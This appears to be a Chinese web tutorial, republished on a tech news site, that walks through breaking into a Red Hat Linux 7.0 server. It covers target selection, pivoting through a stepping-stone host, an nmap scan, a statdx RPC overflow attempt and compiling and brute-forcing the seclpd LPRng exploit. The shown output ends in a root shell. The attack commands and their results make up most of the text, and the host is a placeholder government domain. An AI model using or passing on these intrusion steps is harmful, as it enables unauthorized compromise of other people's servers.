步步入侵REDHAT LINUX7.0
创始人
2024-06-06 08:00:29
0

WINDOWS2000、NT是不是不想“玩”了,快跟我一步步入侵REDHAT LINUX7.0吧!

[一. 确定目标]

日本?台湾?美国?随便你了!

[二.试试他的服务都有些什么]

比如TELNET 或是 FTP等等,你会得到一些系统信息的!

[三.找跳板]

当然也是REDHAT LINUX7.0的了,最好是你自已的,方便嘛!

命令行:

C:\>telnet xxx.xxx.xxx.xxx

登陆上去了吧!

[四.用扫描器看看]

这里我们推荐使用NMAP,因为在UNIX系统中它够爽,输入以下命令:

bash-2.04$(这是系统提示状态) nmap -sT -0 www.xxx.gov(你先前选定的目标)

是不是开了很多端口呀

[五.利用LP(网络打印服务)漏洞入侵]

重点来了!在REDHAT 7.0中有个LP漏洞(其实我们通过上面的扫描结果后也可以试试

RPC漏洞 例如:bash-2.04$ finger @www.xxx.gov 查看用户

bash-2.04$ ./statdx -h 其中statd为rpc.ststd是一个程式需下载

查看系统支持版本

bash-2.04$ stat -d 0 www.xxx.gov 进行溢出)

呵呵,跑题了!

我们需要下载一个SECLPD.C程序,然后将这个程序上传到你的跳板上

用GCC编译一下,输入命令

bash-2.04$ gcc -o seclpd seclpd.c

编译成功后,执行看看命令的使用:

bash-2.04$ ./seclpd

看来就是它了,没有错.开始入侵

输入命令

bash-2.04$ ./seclpd www.xxx.gov -t 0

结果显示失败,在来

bash-2.04$ ./seclpd www.xxx.gov -t 1

又失败,我在来

bash-2.04$ ./seclpd www.xxx.gov brute -t 0 我加BRUTE,暴力,哈哈~

结果不在显示TRY BRUTE FORCE了,是一直想要的RELAX AND ENJOY THE RIDE;>

现在要等它看出不出SHELL,大约五分钟左右,就会有结果出来

- [+] shell located on www.xxx.gov

- [+] enter commands at will

linux xxx.www 2.2.16-22smp #1 smp tue aug 22 17:34:21 edt 2002 i686

unknown

uid=(0)(root) gid=7(lp)

我笑,我大声地笑,我是ROOT了!

【编辑推荐】

  1. RHEL 5系统下故障处理方法
  2. 建立RHEL 5.0下版本控制服务器
  3. RHEL5配置gdm让远程机器登录X window

相关内容

热门资讯

如何允许远程连接到MySQL数... [[277004]]【51CTO.com快译】默认情况下,MySQL服务器仅侦听来自localhos...
如何利用交换机和端口设置来管理... 在网络管理中,总是有些人让管理员头疼。下面我们就将介绍一下一个网管员利用交换机以及端口设置等来进行D...
施耐德电气数据中心整体解决方案... 近日,全球能效管理专家施耐德电气正式启动大型体验活动“能效中国行——2012卡车巡展”,作为该活动的...
20个非常棒的扁平设计免费资源 Apple设备的平面图标PSD免费平板UI 平板UI套件24平图标Freen平板UI套件PSD径向平...
德国电信门户网站可实时显示全球... 德国电信周三推出一个门户网站,直观地实时提供其安装在全球各地的传感器网络检测到的网络攻击状况。该网站...
为啥国人偏爱 Mybatis,... 关于 SQL 和 ORM 的争论,永远都不会终止,我也一直在思考这个问题。昨天又跟群里的小伙伴进行...
《非诚勿扰》红人闫凤娇被曝厕所... 【51CTO.com 综合消息360安全专家提醒说,“闫凤娇”、“非诚勿扰”已经被黑客盯上成为了“木...
2012年第四季度互联网状况报... [[71653]]  北京时间4月25日消息,据国外媒体报道,全球知名的云平台公司Akamai Te...